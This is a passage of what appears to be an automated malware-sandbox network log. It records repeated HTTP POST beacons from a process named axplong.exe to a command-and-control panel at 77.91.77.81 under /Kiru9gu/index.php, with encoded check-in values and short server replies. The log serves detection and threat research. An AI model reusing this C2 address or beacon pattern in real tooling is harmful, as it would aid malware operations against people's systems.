                  Date: Mon, 01 Jul 2024 22:25:56 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Jul 2, 2024 00:25:57.012991905 CEST304OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Jul 2, 2024 00:25:57.245352030 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:25:57 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  46192.168.2.44978377.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:25:57.355557919 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 2, 2024 00:25:58.063947916 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:25:57 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Jul 2, 2024 00:25:58.065080881 CEST304OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Jul 2, 2024 00:25:58.288095951 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:25:58 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  47192.168.2.44978477.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:25:58.404119968 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 2, 2024 00:25:59.105945110 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:25:58 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Jul 2, 2024 00:25:59.106956959 CEST304OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Jul 2, 2024 00:25:59.330193043 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:25:59 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  48192.168.2.44978577.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:25:59.451220036 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 2, 2024 00:26:00.144156933 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:26:00 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Jul 2, 2024 00:26:00.145042896 CEST304OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Jul 2, 2024 00:26:00.363490105 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:26:00 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  49192.168.2.44978677.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:26:00.482901096 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 2, 2024 00:26:01.190731049 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:26:01 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Jul 2, 2024 00:26:01.194610119 CEST304OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Jul 2, 2024 00:26:01.419979095 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:26:01 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  50192.168.2.44978777.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:26:01.527718067 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 2, 2024 00:26:02.301826954 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:26:02 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Jul 2, 2024 00:26:02.303034067 CEST304OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Jul 2, 2024 00:26:02.531218052 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:26:02 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  51192.168.2.44978877.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:26:02.652535915 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 2, 2024 00:26:03.374509096 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:26:03 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Jul 2, 2024 00:26:04.098298073 CEST304OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Jul 2, 2024 00:26:04.335345030 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:26:04 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  52192.168.2.44978977.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:26:04.495989084 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 2, 2024 00:26:05.146099091 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:26:05 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  53192.168.2.44979077.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:26:05.188023090 CEST304OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Jul 2, 2024 00:26:05.885718107 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:26:05 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  54192.168.2.44979177.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:26:05.998982906 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 2, 2024 00:26:06.695009947 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:26:06 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  55192.168.2.44979277.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:26:06.703619957 CEST304OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Jul 2, 2024 00:26:07.433557034 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:26:07 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  56192.168.2.44979377.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:26:07.547960997 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 2, 2024 00:26:08.309590101 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:26:08 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  57192.168.2.44979477.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:26:08.319535971 CEST304OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Jul 2, 2024 00:26:09.030463934 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:26:08 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  58192.168.2.44979577.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:26:09.155659914 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 2, 2024 00:26:09.851804972 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:26:09 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  59192.168.2.44979677.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:26:09.861485004 CEST304OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Jul 2, 2024 00:26:10.644871950 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:26:10 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  60192.168.2.44979777.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:26:10.768449068 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 2, 2024 00:26:11.677237988 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:26:11 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Jul 2, 2024 00:26:11.678893089 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:26:11 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Jul 2, 2024 00:26:11.692898035 CEST304OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Jul 2, 2024 00:26:11.917973995 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:26:11 GMT
